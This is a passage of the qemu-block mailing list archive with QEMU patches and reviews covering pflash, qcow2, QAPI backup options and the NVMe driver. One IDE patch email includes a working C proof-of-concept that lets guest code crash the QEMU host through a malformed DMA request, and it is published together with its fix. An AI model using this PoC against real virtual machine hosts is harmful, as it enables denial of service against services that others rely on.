 goto reset_flash;
 } else
 goto error_flash;
@@ -553,7 +550,7 @@ static void pflash_write(PFlashCFI01 *pfl, hwaddr offset,
 } else if (cmd == 0x01) {
 pfl->wcycle = 0;
 pfl->status |= 0x80;
-} else if (cmd == 0xff) {
+} else if (cmd == 0xff) { /* read array mode */
 goto reset_flash;
 } else {
 DPRINTF("%s: Unknown (un)locking command\n", __func__);
@@ -645,7 +642,7 @@ static void pflash_write(PFlashCFI01 *pfl, hwaddr offset,
 trace_pflash_reset();
 memory_region_rom_device_set_romd(>mem, true);
 pfl->wcycle = 0;
-pfl->cmd = 0;
+pfl->cmd = 0xff;
 }
 
 
@@ -761,7 +758,7 @@ static void pflash_cfi01_realize(DeviceState *dev, Error 
**errp)
 }
 
 pfl->wcycle = 0;
-pfl->cmd = 0;
+pfl->cmd = 0xff;
 pfl->status = 0;
 /* Hardcoded CFI table */
 /* Standard "QRY" string */
@@ -1001,5 +998,11 @@ static int pflash_post_load(void *opaque, int version_id)
 pfl->vmstate = qemu_add_vm_change_state_handler(postload_update_cb,
 pfl);
 }
+if (version_id < 2) {
+/* v1 used incorrect value of 0x00 for the READ_ARRAY command. */
+if (pfl->cmd == 0x00) {
+pfl->cmd =  0xff;
+}
+}
 return 0;
 }
-- 
2.20.1

[Qemu-block] [PATCH v3 1/9] hw/block/pflash_cfi01: Removed an unused timer

2019-07-05 Thread Philippe Mathieu-Daudé

The 'CFI02' NOR flash was introduced in commit 29133e9a0fff, with
timing modelled. One year later, the CFI01 model was introduced
(commit 05ee37ebf630) based on the CFI02 model. As noted in the
header, "It does not support timings". 12 years later, we never
had to model the device timings. Time to remove the unused timer,
we can still add it back if required.

Suggested-by: Laszlo Ersek 
Reviewed-by: Wei Yang 
Reviewed-by: Laszlo Ersek 
Reviewed-by: Alistair Francis 
Regression-tested-by: Laszlo Ersek 
Signed-off-by: Philippe Mathieu-Daudé 
---
v2: Fixed commit description (Laszlo)
---
 hw/block/pflash_cfi01.c | 15 ---
 1 file changed, 15 deletions(-)

diff --git a/hw/block/pflash_cfi01.c b/hw/block/pflash_cfi01.c
index db4a246b22..9e34fd4e82 100644
--- a/hw/block/pflash_cfi01.c
+++ b/hw/block/pflash_cfi01.c
@@ -42,7 +42,6 @@
 #include "hw/block/flash.h"
 #include "sysemu/block-backend.h"
 #include "qapi/error.h"
-#include "qemu/timer.h"
 #include "qemu/bitops.h"
 #include "qemu/error-report.h"
 #include "qemu/host-utils.h"
@@ -90,7 +89,6 @@ struct PFlashCFI01 {
 uint8_t cfi_table[0x52];
 uint64_t counter;
 unsigned int writeblock_size;
-QEMUTimer *timer;
 MemoryRegion mem;
 char *name;
 void *storage;
@@ -114,18 +112,6 @@ static const VMStateDescription vmstate_pflash = {
 }
 };
 
-static void pflash_timer (void *opaque)
-{
-PFlashCFI01 *pfl = opaque;
-
-trace_pflash_timer_expired(pfl->cmd);
-/* Reset flash */
-pfl->status ^= 0x80;
-memory_region_rom_device_set_romd(>mem, true);
-pfl->wcycle = 0;
-pfl->cmd = 0;
-}
-
 /* Perform a CFI query based on the bank width of the flash.
  * If this code is called we know we have a device_width set for
  * this flash.
@@ -774,7 +760,6 @@ static void pflash_cfi01_realize(DeviceState *dev, Error 
**errp)
 pfl->max_device_width = pfl->device_width;
 }
 
-pfl->timer = timer_new_ns(QEMU_CLOCK_VIRTUAL, pflash_timer, pfl);
 pfl->wcycle = 0;
 pfl->cmd = 0;
 pfl->status = 0;
-- 
2.20.1

[Qemu-block] [PATCH for-4.1] qcow2: Allow -o compat=v3 during qemu-img amend

2019-07-05 Thread Eric Blake

Commit b76b4f60 allowed '-o compat=v3' as an alias for the
less-appealing '-o compat=1.1' for 'qemu-img create' since we want to
use the QMP form as much as possible, but forgot to do likewise for
qemu-img amend.  Also, it doesn't help that '-o help' doesn't list our
new preferred spellings.

Signed-off-by: Eric Blake 
---

I'm arguing that the lack of consistency is a bug, even though the bug
has been present since 2.12.

 block/qcow2.c | 6 +++---
 1 file changed, 3 insertions(+), 3 deletions(-)

diff --git a/block/qcow2.c b/block/qcow2.c
index 2a59eb27febb..039bdc2f7e79 100644
--- a/block/qcow2.c
+++ b/block/qcow2.c
@@ -4823,9 +4823,9 @@ static int qcow2_amend_options(BlockDriverState *bs, 
QemuOpts *opts,
 compat = qemu_opt_get(opts, BLOCK_OPT_COMPAT_LEVEL);
 if (!compat) {
 /* preserve default */
-} else if (!strcmp(compat, "0.10")) {
+} else if (!strcmp(compat, "0.10") || !strcmp(compat, "v2")) {
 new_version = 2;
-} else if (!strcmp(compat, "1.1")) {
+} else if (!strcmp(compat, "1.1") || !strcmp(compat, "v3")) {
 new_version = 3;
 } else {
 error_setg(errp, "Unknown compatibility level %s", compat);
@@ -5098,7 +5098,7 @@ static QemuOptsList qcow2_create_opts = {
 {
 .name = BLOCK_OPT_COMPAT_LEVEL,
 .type = QEMU_OPT_STRING,
-.help = "Compatibility level (0.10 or 1.1)"
+.help = "Compatibility level (v2 [0.10] or v3 [1.1])"
 },
 {
 .name = BLOCK_OPT_BACKING_FILE,
-- 
2.20.1

Re: [Qemu-block] [QEMU-SECURITY] ide: fix assertion in ide_dma_cb() to prevent qemu DoS from quest

2019-07-05 Thread Alexander Popov

On 05.07.2019 17:07, Alexander Popov wrote:
> This assertion was introduced in the commit a718978ed58a in July 2015.
> It implies that the size of successful DMA transfers handled in
> ide_dma_cb() should be multiple of 512 (the size of a sector).
> 
> But guest systems can initiate DMA transfers that don't fit this
> requirement. Let's improve the assertion to prevent qemu DoS from quests.

Hello everyone!

This bug was not considered as a security issue by QEMU security team, so I send
this patch to the public mailing list.

Best regards,
Alexander

[Qemu-block] [QEMU-SECURITY] ide: fix assertion in ide_dma_cb() to prevent qemu DoS from quest

2019-07-05 Thread Alexander Popov

This assertion was introduced in the commit a718978ed58a in July 2015.
It implies that the size of successful DMA transfers handled in
ide_dma_cb() should be multiple of 512 (the size of a sector).

But guest systems can initiate DMA transfers that don't fit this
requirement. Let's improve the assertion to prevent qemu DoS from quests.

PoC for Linux that uses SCSI_IOCTL_SEND_COMMAND to perform such an ATA
command and crash qemu:

#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 

#define CMD_SIZE 2048

struct scsi_ioctl_cmd_6 {
unsigned int inlen;
unsigned int outlen;
unsigned char cmd[6];
unsigned char data[];
};

int main(void)
{
intptr_t fd = 0;
struct scsi_ioctl_cmd_6 *cmd = NULL;

cmd = malloc(CMD_SIZE);
if (!cmd) {
perror("[-] malloc");
return 1;
}

memset(cmd, 0, CMD_SIZE);
cmd->inlen = 1337;
cmd->cmd[0] = READ_6;

fd = open("/dev/sg0", O_RDONLY);
if (fd == -1) {
perror("[-] opening sg");
return 1;
}

printf("[+] sg0 is opened\n");

printf("[.] qemu should break here:\n");
fflush(stdout);
ioctl(fd, SCSI_IOCTL_SEND_COMMAND, cmd);
printf("[-] qemu didn't break\n");

free(cmd);

return 1;
}

Signed-off-by: Alexander Popov 
---
 hw/ide/core.c | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/hw/ide/core.c b/hw/ide/core.c
index 6afadf8..304fe69 100644
--- a/hw/ide/core.c
+++ b/hw/ide/core.c
@@ -868,7 +868,7 @@ static void ide_dma_cb(void *opaque, int ret)
 
 sector_num = ide_get_sector(s);
 if (n > 0) {
-assert(n * 512 == s->sg.size);
+assert(n == s->sg.size / 512);
 dma_buf_commit(s, s->sg.size);
 sector_num += n;
 ide_set_sector(s, sector_num);
-- 
2.7.4

Re: [Qemu-block] [Qemu-devel] [PATCH v2 04/18] qapi: add BitmapSyncMode enum

2019-07-05 Thread Markus Armbruster

John Snow  writes:

> Depending on what a user is trying to accomplish, there might be a few
> bitmap cleanup actions that occur when an operation is finished that
> could be useful.
>
> I am proposing three:
> - NEVER: The bitmap is never synchronized against what was copied.
> - ALWAYS: The bitmap is always synchronized, even on failures.
> - CONDITIONAL: The bitmap is synchronized only on success.
>
> The existing incremental backup modes use 'conditional' semantics,
> so add just that one for right now.
>
> Signed-off-by: John Snow 
> ---
>  qapi/block-core.json | 14 ++
>  1 file changed, 14 insertions(+)
>
> diff --git a/qapi/block-core.json b/qapi/block-core.json
> index 7b23efcf13..87eba5a5d9 100644
> --- a/qapi/block-core.json
> +++ b/qapi/block-core.json
> @@ -1134,6 +1134,20 @@
>  { 'enum': 'MirrorSyncMode',
>'data': ['top', 'full', 'none', 'incremental'] }
>  
> +##
> +# @BitmapSyncMode:
> +#
> +# An enumeration of possible behaviors for the synchronization of a bitmap
> +# when used for data copy operations.
> +#
> +# @conditional: The bitmap is only synced when the operation is successful.
> +#   This is the behavior always used for 'INCREMENTAL' backups.
> +#
> +# Since: 4.2
> +##
> +{ 'enum': 'BitmapSyncMode',
> +  'data': ['conditional'] }
> +
>  ##
>  # @MirrorCopyMode:
>  #

The name "conditional" makes me go "on what?".  What about "on-success"?

Re: [Qemu-block] [Qemu-devel] [PATCH v2 01/18] qapi/block-core: Introduce BackupCommon

2019-07-05 Thread Markus Armbruster

John Snow  writes:

> drive-backup and blockdev-backup have an awful lot of things in common
> that are the same. Let's fix that.
>
> I don't deduplicate 'target', because the semantics actually did change
> between each structure. Leave that one alone so it can be documented
> separately.
>
> Signed-off-by: John Snow 
> ---
>  qapi/block-core.json | 103 ++-
>  1 file changed, 33 insertions(+), 70 deletions(-)
>
> diff --git a/qapi/block-core.json b/qapi/block-core.json
> index 0d43d4f37c..7b23efcf13 100644
> --- a/qapi/block-core.json
> +++ b/qapi/block-core.json
> @@ -1315,32 +1315,23 @@
>'data': { 'node': 'str', 'overlay': 'str' } }
>  
>  ##
> -# @DriveBackup:
> +# @BackupCommon:
>  #
>  # @job-id: identifier for the newly-created block job. If
>  #  omitted, the device name will be used. (Since 2.7)
>  #
>  # @device: the device name or node-name of a root node which should be 
> copied.
>  #
> -# @target: the target of the new image. If the file exists, or if it
> -#  is a device, the existing file/device will be used as the new
> -#  destination.  If it does not exist, a new file will be created.
> -#
> -# @format: the format of the new destination, default is to
> -#  probe if @mode is 'existing', else the format of the source
> -#
>  # @sync: what parts of the disk image should be copied to the destination
>  #(all the disk, only the sectors allocated in the topmost image, 
> from a
>  #dirty bitmap, or only new I/O).

This is DriveBackup's wording.  Blockdev lacks "from a dirty bitmap, ".
Is this a doc fix?

>  #
> -# @mode: whether and how QEMU should create a new image, default is
> -#'absolute-paths'.
> -#
> -# @speed: the maximum speed, in bytes per second
> +# @speed: the maximum speed, in bytes per second. The default is 0,
> +# for unlimited.

This is Blockdev's wording.  DriveBackup lacks "the default is 0, for
unlimited."  Is this a doc fix?

>  #
>  # @bitmap: the name of dirty bitmap if sync is "incremental".
>  #  Must be present if sync is "incremental", must NOT be present
> -#  otherwise. (Since 2.4)
> +#  otherwise. (Since 2.4 (Drive), 3.1 (Blockdev))

I second Max's request to say (drive-backup) and (blockdev-backup),
strongly.

>  #
>  # @compress: true to compress data, if the target format supports it.
>  #(default: false) (since 2.8)
> @@ -1372,73 +1363,45 @@
>  #
>  # Since: 1.6

BackupCommon is actually since 4.2.

The type doesn't appear in the external interface (only its extensions
DriveBackup and BlockdevBackup do), so documenting "since" is actually
pointless.  However, we blindly document "since" for *everything*,
simply because we don't want to waste time on deciding whether we have
to.

>  ##
> +{ 'struct': 'BackupCommon',
> +  'data': { '*job-id': 'str', 'device': 'str',
> +'sync': 'MirrorSyncMode', '*speed': 'int',
> +'*bitmap': 'str', '*compress': 'bool',
> +'*on-source-error': 'BlockdevOnError',
> +'*on-target-error': 'BlockdevOnError',
> +'*auto-finalize': 'bool', '*auto-dismiss': 'bool' } }
> +
> +##
> +# @DriveBackup:
> +#
> +# @target: the target of the new image. If the file exists, or if it
> +#  is a device, the existing file/device will be used as the new
> +#  destination.  If it does not exist, a new file will be created.
> +#
> +# @format: the format of the new destination, default is to
> +#  probe if @mode is 'existing', else the format of the source
> +#
> +# @mode: whether and how QEMU should create a new image, default is
> +#'absolute-paths'.
> +#
> +# Since: 1.6
> +##
>  { 'struct': 'DriveBackup',
> -  'data': { '*job-id': 'str', 'device': 'str', 'target': 'str',
> -'*format': 'str', 'sync': 'MirrorSyncMode',
> -'*mode': 'NewImageMode', '*speed': 'int',
> -'*bitmap': 'str', '*compress': 'bool',
> -'*on-source-error': 'BlockdevOnError',
> -'*on-target-error': 'BlockdevOnError',
> -'*auto-finalize': 'bool', '*auto-dismiss': 'bool' } }
> +  'base': 'BackupCommon',
> +  'data': { 'target': 'str',
> +'*format': 'str',
> +'*mode': 'NewImageMode' } }
>  
>  ##
>  # @BlockdevBackup:
>  #
> -# @job-id: identifier for the newly-created block job. If
> -#  omitted, the device name will be used. (Since 2.7)
> -#
> -# @device: the device name or node-name of a root node which should be 
> copied.
> -#
>  # @target: the device name or node-name of the backup target node.
>  #
> -# @sync: what parts of the disk image should be copied to the destination
> -#(all the disk, only the sectors allocated in the topmost image, or
> -#only new I/O).
> -#
> -# @speed: the maximum speed, in bytes per second. The default is 0,
> -# for unlimited.
> -#
> -# @bitmap: the name of dirty bitmap if sync is

Re: [Qemu-block] [PATCH v4] block/nvme: add support for discard

2019-07-05 Thread Max Reitz

On 03.07.19 18:07, Maxim Levitsky wrote:
> Signed-off-by: Maxim Levitsky 
> ---
>  block/nvme.c   | 81 ++
>  block/trace-events |  2 ++
>  2 files changed, 83 insertions(+)
> 
> diff --git a/block/nvme.c b/block/nvme.c
> index 02e0846643..96a715dcc1 100644
> --- a/block/nvme.c
> +++ b/block/nvme.c

[...]

> @@ -460,6 +461,7 @@ static void nvme_identify(BlockDriverState *bs, int 
> namespace, Error **errp)
>s->page_size / sizeof(uint64_t) * s->page_size);
>  
>  s->supports_write_zeros = (idctrl->oncs & NVME_ONCS_WRITE_ZEROS) != 0;
> +s->supports_discard = (idctrl->oncs & NVME_ONCS_DSM) != 0;

Shouldn’t this be le16_to_cpu(idctrl->oncs)?  Same in the previous
patch, now that I think about it.

>  
>  memset(resp, 0, 4096);
>  
> @@ -1149,6 +1151,84 @@ static coroutine_fn int 
> nvme_co_pwrite_zeroes(BlockDriverState *bs,
>  }
>  
>  
> +static int coroutine_fn nvme_co_pdiscard(BlockDriverState *bs,
> + int64_t offset,
> + int bytes)
> +{
> +BDRVNVMeState *s = bs->opaque;
> +NVMeQueuePair *ioq = s->queues[1];
> +NVMeRequest *req;
> +NvmeDsmRange *buf;
> +QEMUIOVector local_qiov;
> +int r;
> +
> +NvmeCmd cmd = {
> +.opcode = NVME_CMD_DSM,
> +.nsid = cpu_to_le32(s->nsid),
> +.cdw10 = 0, /*number of ranges - 0 based*/

I’d make this cpu_to_le32(0).  Sure, there is no effect for 0, but in
theory this is a variable value, so...

> +.cdw11 = cpu_to_le32(1 << 2), /*deallocate bit*/
> +};
> +
> +NVMeCoData data = {
> +.ctx = bdrv_get_aio_context(bs),
> +.ret = -EINPROGRESS,
> +};
> +
> +if (!s->supports_discard) {
> +return -ENOTSUP;
> +}
> +
> +assert(s->nr_queues > 1);
> +
> +buf = qemu_try_blockalign0(bs, 4096);

I’m not sure whether this needs to be 4096 or whether 16 would suffice,
 but I suppose this gets us the least trouble.

> +if (!buf) {
> +return -ENOMEM;

Indentation is off.

> +}
> +
> +buf->nlb = cpu_to_le32(bytes >> s->blkshift);
> +buf->slba = cpu_to_le64(offset >> s->blkshift);
> +buf->cattr = 0;
> +
> +qemu_iovec_init(_qiov, 1);
> +qemu_iovec_add(_qiov, buf, 4096);
> +
> +req = nvme_get_free_req(ioq);
> +assert(req);
> +
> +qemu_co_mutex_lock(>dma_map_lock);
> +r = nvme_cmd_map_qiov(bs, , req, _qiov);
> +qemu_co_mutex_unlock(>dma_map_lock);
> +
> +if (r) {
> +req->busy = false;
> +return r;

Leaking buf and local_qiov here.

> +}
> +
> +trace_nvme_dsm(s, offset, bytes);
> +
> +nvme_submit_command(s, ioq, req, , nvme_rw_cb, );
> +
> +data.co = qemu_coroutine_self();
> +while (data.ret == -EINPROGRESS) {
> +qemu_coroutine_yield();
> +}
> +
> +qemu_co_mutex_lock(>dma_map_lock);
> +r = nvme_cmd_unmap_qiov(bs, _qiov);
> +qemu_co_mutex_unlock(>dma_map_lock);
> +if (r) {
> +return r;

Leaking buf and local_qiov here, too.

Max

> +}
> +
> +trace_nvme_dsm_done(s, offset, bytes, data.ret);
> +
> +qemu_iovec_destroy(_qiov);
> +qemu_vfree(buf);
> +return data.ret;
> +
> +}
> +
> +
>  static int nvme_reopen_prepare(BDRVReopenState *reopen_state,
> BlockReopenQueue *queue, Error **errp)
>  {



signature.asc
Description: OpenPGP digital signature

Re: [Qemu-block] [Qemu-devel] [PATCH 16/16] nvme: support multiple namespaces

2019-07-05 Thread Daniel P . Berrangé

On Fri, Jul 05, 2019 at 03:36:17PM +0200, Klaus Birkelund wrote:
> On Fri, Jul 05, 2019 at 09:23:33AM +0200, Klaus Birkelund Jensen wrote:
> > This adds support for multiple namespaces by introducing a new 'nvme-ns'
> > device model. The nvme device creates a bus named from the device name
> > ('id'). The nvme-ns devices then connect to this and registers
> > themselves with the nvme device.
> > 
> > This changes how an nvme device is created. Example with two namespaces:
> > 
> >   -drive file=nvme0n1.img,if=none,id=disk1
> >   -drive file=nvme0n2.img,if=none,id=disk2
> >   -device nvme,serial=deadbeef,id=nvme0
> >   -device nvme-ns,drive=disk1,bus=nvme0,nsid=1
> >   -device nvme-ns,drive=disk2,bus=nvme0,nsid=2
> > 
> > A maximum of 256 namespaces can be configured.
> > 
>  
> Well that was embarrasing.
> 
> This patch breaks nvme-test.c. Which I obviously did not run.
> 
> In my defense, the test doesn't do much currently, but I'll of course
> fix the test for v2.

That highlights a more serious problem.  This series changes the syntx
for configuring the nvme device in a way that is not backwards compatible.
So anyone who is using QEMU with NVME will be broken when they upgrade
to the next QEMU release.

I understand why you wanted to restructure things to have a separate
nvme-ns device, but there needs to be some backcompat support in there
for the existing syntax to avoid breaking current users IMHO.


Regards,
Daniel
-- 
|: https://berrange.com  -o-https://www.flickr.com/photos/dberrange :|
|: https://libvirt.org -o-https://fstop138.berrange.com :|
|: https://entangle-photo.org-o-https://www.instagram.com/dberrange :|

Re: [Qemu-block] [PATCH 16/16] nvme: support multiple namespaces

2019-07-05 Thread Klaus Birkelund

On Fri, Jul 05, 2019 at 09:23:33AM +0200, Klaus Birkelund Jensen wrote:
> This adds support for multiple namespaces by introducing a new 'nvme-ns'
> device model. The nvme device creates a bus named from the device name
> ('id'). The nvme-ns devices then connect to this and registers
> themselves with the nvme device.
> 
> This changes how an nvme device is created. Example with two namespaces:
> 
>   -drive file=nvme0n1.img,if=none,id=disk1
>   -drive file=nvme0n2.img,if=none,id=disk2
>   -device nvme,serial=deadbeef,id=nvme0
>   -device nvme-ns,drive=disk1,bus=nvme0,nsid=1
>   -device nvme-ns,drive=disk2,bus=nvme0,nsid=2
> 
> A maximum of 256 namespaces can be configured.
> 
 
Well that was embarrasing.

This patch breaks nvme-test.c. Which I obviously did not run.

In my defense, the test doesn't do much currently, but I'll of course
fix the test for v2.

Re: [Qemu-block] [PATCH v3 5/6] block/nvme: add support for write zeros

2019-07-05 Thread Max Reitz

On 03.07.19 17:59, Maxim Levitsky wrote:
> Signed-off-by: Maxim Levitsky 
> ---
>  block/nvme.c | 69 +++-
>  block/trace-events   |  1 +
>  include/block/nvme.h | 19 +++-
>  3 files changed, 87 insertions(+), 2 deletions(-)
> 
> diff --git a/block/nvme.c b/block/nvme.c
> index 152d27b07f..02e0846643 100644
> --- a/block/nvme.c
> +++ b/block/nvme.c

[...]

> @@ -469,6 +473,11 @@ static void nvme_identify(BlockDriverState *bs, int 
> namespace, Error **errp)
>  s->nsze = le64_to_cpu(idns->nsze);
>  lbaf = >lbaf[NVME_ID_NS_FLBAS_INDEX(idns->flbas)];
>  
> +if (NVME_ID_NS_DLFEAT_WRITE_ZEROS(idns->dlfeat) &&
> +NVME_ID_NS_DLFEAT_READ_BEHAVIOR(idns->dlfeat) ==
> +NVME_ID_NS_DLFEAT_READ_BEHAVIOR_ZEROS)
> +bs->supported_write_flags |= BDRV_REQ_MAY_UNMAP;
> +

This violates the coding style, there should be curly brackets here.

>  if (lbaf->ms) {
>  error_setg(errp, "Namespaces with metadata are not yet supported");
>  goto out;
> @@ -763,6 +772,8 @@ static int nvme_file_open(BlockDriverState *bs, QDict 
> *options, int flags,
>  int ret;
>  BDRVNVMeState *s = bs->opaque;
>  
> +bs->supported_write_flags = BDRV_REQ_FUA;
> +
>  opts = qemu_opts_create(_opts, NULL, 0, _abort);
>  qemu_opts_absorb_qdict(opts, options, _abort);
>  device = qemu_opt_get(opts, NVME_BLOCK_OPT_DEVICE);
> @@ -791,7 +802,6 @@ static int nvme_file_open(BlockDriverState *bs, QDict 
> *options, int flags,
>  goto fail;
>  }
>  }
> -bs->supported_write_flags = BDRV_REQ_FUA;

Any reason for this movement?

>  return 0;
>  fail:
>  nvme_close(bs);
> @@ -1085,6 +1095,60 @@ static coroutine_fn int nvme_co_flush(BlockDriverState 
> *bs)
>  }
>  
>  
> +static coroutine_fn int nvme_co_pwrite_zeroes(BlockDriverState *bs,
> +  int64_t offset,
> +  int bytes,
> +  BdrvRequestFlags flags)
> +{
> +BDRVNVMeState *s = bs->opaque;
> +NVMeQueuePair *ioq = s->queues[1];
> +NVMeRequest *req;
> +
> +if (!s->supports_write_zeros) {
> +return -ENOTSUP;
> +}
> +
> +uint32_t cdw12 = ((bytes >> s->blkshift) - 1) & 0x;

Another coding style violation: Variable declarations and other code may
not be mixed.

> +
> +NvmeCmd cmd = {
> +.opcode = NVME_CMD_WRITE_ZEROS,
> +.nsid = cpu_to_le32(s->nsid),
> +.cdw10 = cpu_to_le32((offset >> s->blkshift) & 0x),
> +.cdw11 = cpu_to_le32(((offset >> s->blkshift) >> 32) & 0x),
> +};
> +
> +NVMeCoData data = {
> +.ctx = bdrv_get_aio_context(bs),
> +.ret = -EINPROGRESS,
> +};

[...]

> diff --git a/include/block/nvme.h b/include/block/nvme.h
> index 3ec8efcc43..65eb65c740 100644
> --- a/include/block/nvme.h
> +++ b/include/block/nvme.h
> @@ -653,12 +653,29 @@ typedef struct NvmeIdNs {
>  uint8_t mc;
>  uint8_t dpc;
>  uint8_t dps;
> -uint8_t res30[98];
> +
> +uint8_t nmic;
> +uint8_t rescap;
> +uint8_t fpi;
> +uint8_t dlfeat;
> +
> +uint8_t res30[94];
>  NvmeLBAFlbaf[16];
>  uint8_t res192[192];
>  uint8_t vs[3712];
>  } NvmeIdNs;
>  
> +
> +/*Deallocate Logical Block Features*/
> +#define NVME_ID_NS_DLFEAT_GUARD_CRC(dlfeat)   ((dlfeat) & 0x10)
> +#define NVME_ID_NS_DLFEAT_WRITE_ZEROS(dlfeat) ((dlfeat) & 0x04)

Isn’t it bit 3, i.e. 0x08?

Max

> +
> +#define NVME_ID_NS_DLFEAT_READ_BEHAVIOR(dlfeat) ((dlfeat) & 0x3)
> +#define NVME_ID_NS_DLFEAT_READ_BEHAVIOR_UNDEFINED   0
> +#define NVME_ID_NS_DLFEAT_READ_BEHAVIOR_ZEROS   1
> +#define NVME_ID_NS_DLFEAT_READ_BEHAVIOR_ONES2
> +
> +
>  #define NVME_ID_NS_NSFEAT_THIN(nsfeat)  ((nsfeat & 0x1))
>  #define NVME_ID_NS_FLBAS_EXTENDED(flbas)((flbas >> 4) & 0x1)
>  #define NVME_ID_NS_FLBAS_INDEX(flbas)   ((flbas & 0xf))
> 




signature.asc
Description: OpenPGP digital signature

Re: [Qemu-block] [PATCH v3 4/6] block/nvme: add support for image creation

2019-07-05 Thread Max Reitz

On 03.07.19 17:59, Maxim Levitsky wrote:
> Tesed on a nvme device like that:
> 
> # create preallocated qcow2 image
> $ qemu-img create -f qcow2 nvme://:06:00.0/1 10G -o preallocation=metadata
> Formatting 'nvme://:06:00.0/1', fmt=qcow2 size=10737418240 
> cluster_size=65536 preallocation=metadata lazy_refcounts=off refcount_bits=16
> 
> # create an empty qcow2 image
> $ qemu-img create -f qcow2 nvme://:06:00.0/1 10G -o preallocation=off
> Formatting 'nvme://:06:00.0/1', fmt=qcow2 size=10737418240 
> cluster_size=65536 preallocation=off lazy_refcounts=off refcount_bits=16
> 
> Signed-off-by: Maxim Levitsky 
> ---
>  block/nvme.c | 108 +++
>  1 file changed, 108 insertions(+)

Hm.  I’m not quite sure I like this, because this is not image creation.

What we need is a general interface for formatting existing files.  I
mean, we have that in QMP (blockdev-create), but the problem is that
this doesn’t really translate to qemu-img create.

I wonder whether it’s best to hack something up that makes
bdrv_create_file() a no-op, or whether we should expose blockdev-create
over qemu-img.  I’ll see how difficult the latter is, it sounds fun
(famous last words).

Max

signature.asc
Description: OpenPGP digital signature

Re: [Qemu-block] [PATCH v3 3/6] block/nvme: support larger that 512 bytes sector devices

2019-07-05 Thread Max Reitz

On 03.07.19 17:59, Maxim Levitsky wrote:
> Currently the driver hardcodes the sector size to 512,
> and doesn't check the underlying device. Fix that.
> 
> Also fail if underlying nvme device is formatted with metadata
> as this needs special support.
> 
> Signed-off-by: Maxim Levitsky 
> ---
>  block/nvme.c | 45 -
>  1 file changed, 40 insertions(+), 5 deletions(-)
> 
> diff --git a/block/nvme.c b/block/nvme.c
> index 52798081b2..1f0d09349f 100644
> --- a/block/nvme.c
> +++ b/block/nvme.c

[...]

> @@ -463,7 +467,22 @@ static void nvme_identify(BlockDriverState *bs, int 
> namespace, Error **errp)
>  }
>  
>  s->nsze = le64_to_cpu(idns->nsze);
> +lbaf = >lbaf[NVME_ID_NS_FLBAS_INDEX(idns->flbas)];
> +
> +if (lbaf->ms) {
> +error_setg(errp, "Namespaces with metadata are not yet supported");
> +goto out;
> +}
> +
> +hwsect_size = 1 << lbaf->ds;
> +
> +if (hwsect_size < BDRV_SECTOR_BITS || hwsect_size > s->page_size) {

s/BDRV_SECTOR_BITS/BDRV_SECTOR_SIZE/

> +error_setg(errp, "Namespace has unsupported block size (%d)",
> +hwsect_size);
> +goto out;
> +}
>  
> +s->blkshift = lbaf->ds;
>  out:
>  qemu_vfio_dma_unmap(s->vfio, resp);
>  qemu_vfree(resp);
> @@ -782,8 +801,22 @@ fail:
>  static int64_t nvme_getlength(BlockDriverState *bs)
>  {
>  BDRVNVMeState *s = bs->opaque;
> +return s->nsze << s->blkshift;
> +}
>  
> -return s->nsze << BDRV_SECTOR_BITS;
> +static int64_t nvme_get_blocksize(BlockDriverState *bs)
> +{
> +BDRVNVMeState *s = bs->opaque;
> +assert(s->blkshift >= 9);

I think BDRV_SECTOR_BITS is more correct here (this is about what the
general block layer code expects).  Also, there’s no pain in doing so,
as you did check against BDRV_SECTOR_SIZE in nvme_identify().

Max

> +return 1 << s->blkshift;
> +}
> +
> +static int nvme_probe_blocksizes(BlockDriverState *bs, BlockSizes *bsz)
> +{
> +int64_t blocksize = nvme_get_blocksize(bs);
> +bsz->phys = blocksize;
> +bsz->log = blocksize;
> +return 0;
>  }
>  
>  /* Called with s->dma_map_lock */



signature.asc
Description: OpenPGP digital signature

Re: [Qemu-block] [PATCH v3 2/6] block/nvme: fix doorbell stride

2019-07-05 Thread Max Reitz

On 05.07.19 13:09, Max Reitz wrote:
> On 03.07.19 17:59, Maxim Levitsky wrote:
>> Fix the math involving non standard doorbell stride
>>
>> Signed-off-by: Maxim Levitsky 
>> ---
>>  block/nvme.c | 2 +-
>>  1 file changed, 1 insertion(+), 1 deletion(-)
>>
>> diff --git a/block/nvme.c b/block/nvme.c
>> index 6d4e7f3d83..52798081b2 100644
>> --- a/block/nvme.c
>> +++ b/block/nvme.c
>> @@ -217,7 +217,7 @@ static NVMeQueuePair 
>> *nvme_create_queue_pair(BlockDriverState *bs,
>>  error_propagate(errp, local_err);
>>  goto fail;
>>  }
>> -q->cq.doorbell = >regs->doorbells[idx * 2 * s->doorbell_scale + 1];
>> +q->cq.doorbell = >regs->doorbells[(idx * 2 + 1) * s->doorbell_scale];
>>  
>>  return q;
>>  fail:
> 
> Hm.  How has this ever worked?

(Ah, because CAP.DSTRD has probably been 0 in most devices.)



signature.asc
Description: OpenPGP digital signature

Re: [Qemu-block] [PATCH v3 2/6] block/nvme: fix doorbell stride

2019-07-05 Thread Max Reitz

On 03.07.19 17:59, Maxim Levitsky wrote:
> Fix the math involving non standard doorbell stride
> 
> Signed-off-by: Maxim Levitsky 
> ---
>  block/nvme.c | 2 +-
>  1 file changed, 1 insertion(+), 1 deletion(-)
> 
> diff --git a/block/nvme.c b/block/nvme.c
> index 6d4e7f3d83..52798081b2 100644
> --- a/block/nvme.c
> +++ b/block/nvme.c
> @@ -217,7 +217,7 @@ static NVMeQueuePair 
> *nvme_create_queue_pair(BlockDriverState *bs,
>  error_propagate(errp, local_err);
>  goto fail;
>  }
> -q->cq.doorbell = >regs->doorbells[idx * 2 * s->doorbell_scale + 1];
> +q->cq.doorbell = >regs->doorbells[(idx * 2 + 1) * s->doorbell_scale];
>  
>  return q;
>  fail:

Hm.  How has this ever worked?

Reviewed-by: Max Reitz 



signature.asc
Description: OpenPGP digital signature

Re: [Qemu-block] [PATCH v3 1/6] block/nvme: don't touch the completion entries

2019-07-05 Thread Max Reitz

On 03.07.19 17:59, Maxim Levitsky wrote:
> Completion entries are meant to be only read by the host and written by the 
> device.
> The driver is supposed to scan the completions from the last point where it 
> left,
> and until it sees a completion with non flipped phase bit.

(Disclaimer: This is the first time I read the nvme driver, or really
something in the nvme spec.)

Well, no, completion entries are also meant to be initialized by the
host.  To me it looks like this is the place where that happens:
Everything that has been processed by the device is immediately being
re-initialized.

Maybe we shouldn’t do that here but in nvme_submit_command().  But
currently we don’t, and I don’t see any other place where we currently
initialize the CQ entries.

Max

> Signed-off-by: Maxim Levitsky 
> ---
>  block/nvme.c | 5 +
